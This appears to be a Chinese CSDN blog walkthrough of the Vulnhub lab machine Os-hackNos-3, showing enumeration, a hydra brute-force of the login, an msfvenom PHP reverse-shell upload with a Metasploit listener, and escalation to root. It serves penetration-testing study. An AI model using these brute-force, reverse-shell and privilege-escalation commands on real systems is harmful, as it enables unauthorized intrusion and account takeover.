Hacknos-3

已于 2023-06-15 11:50:12 修改
阅读量90 收藏
点赞数
文章标签: php 开发语言 网络安全
于 2023-06-13 17:48:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45747465/article/details/131193400
版权

实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台

实验网络:桥接网络

实验目标:获取靶机的Root权限

难易程度:简单

一 部署环境

1:下载Virtualbox虚拟化软件

2:下载目标靶机 hacknos3 并导入Virtualbox

Os-hackNos-3.ova 需要修改的内容

3:kal改成桥接

二 测试步骤

第一步:信息收集

步骤一:发现主机

arp-scan -l

步骤二:进行目录遍历 访问/tsweb

dirb http://192.168.0.101/

步骤三:访问scripts发现没用

步骤四:发现首页下面有一个websec 访问试一下

步骤五:遍历websec 访问admin和login 发现相同 进行登录

dirb http://192.168.0.100/websec

步骤六: 在刚开始的首页发先有地址contact@hacknos.com 猜测为登录名使用cewl工具对其网站信息进行收集并制作成字典

cewl http://192.168.0.101/websec/websec > cewl.txt

步骤七:使用hydra进行密码破解 并进行登录

hydra -l contact@hacknos.com -P cewl.txt  192.168.0.101 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email" -V

登录名 contact@hacknos.com  
登陆密码  Securityx

第二步:漏洞利用 获取webshell

步骤一:在界面 发现上传文件的地方 利用msf生成木马并且msf开启监听

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 R > shll.php  //生成木马


//msf开启监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 4444
run

步骤二:将生成的msf木马上传到tmp的php.php中并保存

步骤三:通过python获取tty

python -c 'import pty;pty.spawn("/bin/bash")'

步骤四:获取到第一个flag

第三步:权限提升

步骤一:查看是否有可利用的提权文件或者看能否sudo

find / -perm -4000 -type f 2>/dev/null

步骤二:发现并没有可利用的,查看受否存用户 在home下发现存在blackdevil

步骤三:在/var/local/database 发现加密值 进行破解

破解网站
https://www.spammimic.com/spreadsheet.php?action=decode

登录名     blackdevil
密码   Security@x@

步骤四:登录blackdevil 密码Security 切换权限为root

su blackdevil   //切换用户为blackdevil
sudo su    //切换为root权限

步骤五:获取flag

遇见旎
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
靶机测试Os-hacknos-3笔记
qq_56426046的博客
01-07 523
Difficulty: IntermediateFlag: 2 Flag first user And the second rootLearning: Web Application | Enumeration | Privilege EscalationWeb-site: www.hacknos.comContact-us : @rahul_gehlautThis works better with VirtualBox rather than VMwarehttps://www.vulnhub.com
Os-hackNos-3
果粒程
11-22 289
Os-hackNos-3
Vulnhub靶机:HACKNOS_ OS-HACKNOS-3
LainWith的博客
01-16 1967
目录介绍信息收集主机发现主机信息探测网站探测目录扫描访问子目录爆破登录站点登录网站Getshell方法1:命令执行-失败方法2:msf-失败方法3:冰蝎第一个Flag提权获取flag2查找 suid 文件-cpulimit提权通过dock提权参考 介绍 系列: hackNos 发布日期: 2019年12月14日 难度: 中级 Flag : 一个普通用户的,一个根用户的 学习:漏洞利用、web攻击、枚举、权限提升 靶机地址:https://www.vulnhub.com/entry/hacknos-os-ha
oscp——Os-hackNos-3
王嘟嘟的博客
02-02 886
0x00 前言 这个是第十八台机子了,之前做过同系列的Os-hackNos-2.1。 最后,E788B1E88081E5A986E5939F 链接 https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 0x01 信息收集 ip 端口 0x02 攻击 端口 端口未果 Web 80端口访问一下,dirb dirb爆破结果 dirb htt...
【甄选靶场】Vulnhub百个项目渗透——项目五十:Os-hackNos-3IMF-1(gila—cmsfakespreadsheet解密)
人间体佐菲的博客
10-24 833
【甄选靶场】Vulnhub百个项目渗透——项目五十:Os-hackNos-3IMF-1(gila—cmsfakespreadsheet解密)
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
vulnhub 靶场 Os-hackNos-3
zzzzzzkeai的博客
11-27 145
vulnhub 靶场 Os-hackNos-3
VulnHub—Os-hackNos-3
weixin_39219503的博客
01-07 812
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 题目信息如下,难度中等,需要获取俩个flag Difficulty: Intermediate Flag: 2 Flag first user And the second root Learning: Web Application | Enume...
『VulnHub系列』hackNos: Os-hackNos-3-Walkthrough
ins1ght的博客
01-19 1210
这是我完成的VulnHub上的第33个靶机。靶机发布日期:2019年12月14日,难度:中等。标签:docker提权、cpulimit提权
vulnhub靶机 Os-hacknos-3
witwitwiter的博客
08-27 528
vulnhub靶机 Os-hacknos-3 靶机地址hackNos: Os-hackNos-3 ~ VulnHub 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 靶机netplan配置参考我之前的vulnhub靶机 0s-hackNos-2.1_witwitwiter的博客-CSDN博客 渗透测试 使用nmap进行端口扫描 └─# nmap -sV 192.168.5.134 Starting Nmap 7.91 ( https://nmap.org ) at 20
vulnhub靶机之Os-hackNos
timesleep的博客
12-13 484
我们的靶机IP为192.168.34.152 kali的IP为192.168.34.175 我们先扫描 我们访问一下80顺带扫一下目录 我们看到有drupal我们先看一下是什么版本 然后我们查了一个exp 好我们把他下载出来 git clone https://github.com/dreadlocked/Drupalgeddon2.git gem install highline ./...
No.50-VulnHub-hackNos: Os-hackNos-3-Walkthrough渗透学习
qq_34801745的博客
02-09 724
** VulnHub-hackNos: Os-hackNos-3-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 靶机难度:容易+中级(CTF) 靶机发布日期:2019年12月14日 靶机描述: Difficulty: Intermediate Flag: 2 Flag first user A...
Vue3+ element plus 前后分离admin项目安装教程
最新发布
luck332的专栏
07-21 236
前后分离admin项目安装基于 vue3.x + CompositionAPI + typescript + vite + element plus + vue-router-next + pinia,适配手机、平板、pc 的后台开源免费模板,希望减少工作量,帮助大家实现快速开发
华为HCIP Datacom H12-821 卷42
QIN_yuexiang的博客
07-17 344
转换的第一步将FFFE插入MAC地址的公司标识和扩展标识符之间,第二步将从高位数,第7位的0改为1,1改为0。这种由MAC地址产生IPv6地址接口标识的方法可以减少配置的工作量,尤其是当采用无状态地址自动配置时,只需要获取一个IPv6前缀就可以与接口标识形成IPv6地址。已知某接口的MAC地址为OA-04-3B-45-1A-03,那么根据IEEE EUI-64规范生成的接口ID标识为:___-___-___-___-___-___-1A-03。数据链路层——ARP欺骗 网络层—Smurf攻击;
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
12年全栈程序开发
07-17 303
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 813
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 322
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
接入百度文心一言API教程
荻酷网的博客
07-21 540
然后,编辑文章。点击AI识别摘要,然后保存即可COREAIPOWER设置暂时只支持经典编辑器.古腾堡编辑器等几个版本后支持.在比期间,你可以自己写点摘要摘要内容AL识别摘要清空。
windows压缩包爆破
08-13
要在Windows上进行压缩包的爆破,您可以使用工具rarcrack。rarcrack可以指定要爆破的文件类型,如rar、zip、7z,并可以定义最大长度等参数。它最大支持12线程来加速爆破过程。使用命令rarcrack [压缩包路径 -threads 12 -type [压缩包类型可以进行爆破操作。然而,需要注意的是,爆破过程可能需要一定的时间,并且并不保证一定能成功破解密码。有时候可能会出现没有结果或速度较慢的情况。另外,如果您需要爆破zip压缩包,您还可以使用工具fcrackzip。使用命令fcrackzip [压缩包路径可以进行zip压缩包的爆破。 [2] 引用 > [保存密码哈希的文件可以提取密码哈希。然后使用John the Ripper等工具进行破解。 [3<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [如何才能简洁高效不失优雅的爆破ZIP文件?](https://blog.csdn.net/zxsctf/article/details/131356650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOSOS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值